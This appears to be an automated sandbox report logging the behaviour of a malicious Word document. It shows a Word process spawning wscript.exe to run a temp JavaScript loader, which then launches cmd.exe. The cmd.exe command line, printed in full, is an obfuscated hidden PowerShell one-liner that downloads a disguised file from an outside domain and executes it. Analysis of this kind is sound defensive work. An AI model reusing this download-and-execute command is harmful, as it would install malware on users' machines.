Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0x74c

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #15: wscript.exe

186

0

»

Information	Value
ID	#15
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:07, Reason: Child Process
Unmonitor	End Time: 00:01:11, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x1ec
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 478 0x AEC 0x B08 0x A04 0x B0C 0x 9EC 0x A00 0x A0C 0x B28 0x B7C

Threads

Thread 0x478

185

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:10 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 137904	1	Fn
System	Get Time	type = Performance Ctr, time = 19200664493	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffdb0000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:10 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 138263	1	Fn
System	Get Time	type = Performance Ctr, time = 19237375087	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 138279	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = Üó"	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:10 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 138326	1	Fn
System	Get Time	type = Performance Ctr, time = 19243861164	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:10 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 138341	1	Fn
System	Get Time	type = Performance Ctr, time = 19245346888	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 138840	1	Fn
System	Get Time	type = Ticks, time = 139121	1	Fn
System	Get Time	type = Ticks, time = 139464	1	Fn
System	Get Time	type = Ticks, time = 139620	3	Fn
System	Get Time	type = Ticks, time = 139636	1	Fn
System	Get Time	type = Ticks, time = 139652	3	Fn
System	Get Time	type = Ticks, time = 139698	3	Fn
System	Get Time	type = Ticks, time = 139714	2	Fn
System	Get Time	type = Ticks, time = 139730	3	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 139823	2	Fn
System	Get Time	type = Ticks, time = 139839	5	Fn
System	Get Time	type = Ticks, time = 139870	1	Fn
System	Get Time	type = Ticks, time = 139886	3	Fn
System	Get Time	type = Ticks, time = 139901	1	Fn
System	Get Time	type = Ticks, time = 139948	1	Fn
System	Get Time	type = Ticks, time = 139964	1	Fn
System	Get Time	type = Ticks, time = 139979	2	Fn
System	Get Time	type = Ticks, time = 139995	4	Fn
System	Get Time	type = Ticks, time = 140010	1	Fn
System	Get Time	type = Ticks, time = 140042	1	Fn
System	Get Time	type = Ticks, time = 140057	3	Fn
System	Get Time	type = Ticks, time = 140104	1	Fn
System	Get Time	type = Ticks, time = 140166	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:12 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 140182	1	Fn
System	Get Time	type = Performance Ctr, time = 19431117291	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffdb0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xffdbd7f8	1	Fn
System	Get Time	type = Ticks, time = 140182	1	Fn
COM	Get Class ID	cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.applicatiOn	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = Ticks, time = 140198	3	Fn
Process	Create	process_name = cmd.exe, show_window = 2273344	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0xb08

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 2841184		1	Fn

Process #16: cmd.exe

62

0

»

Information	Value
ID	#16
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:10, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:14

OS Process Information

»

Information	Value
PID	0xba0
Parent PID	0x1ec (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B8C

Threads

Thread 0xb8c

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:13 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 141617	1	Fn
System	Get Time	type = Performance Ctr, time = 19576788319	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
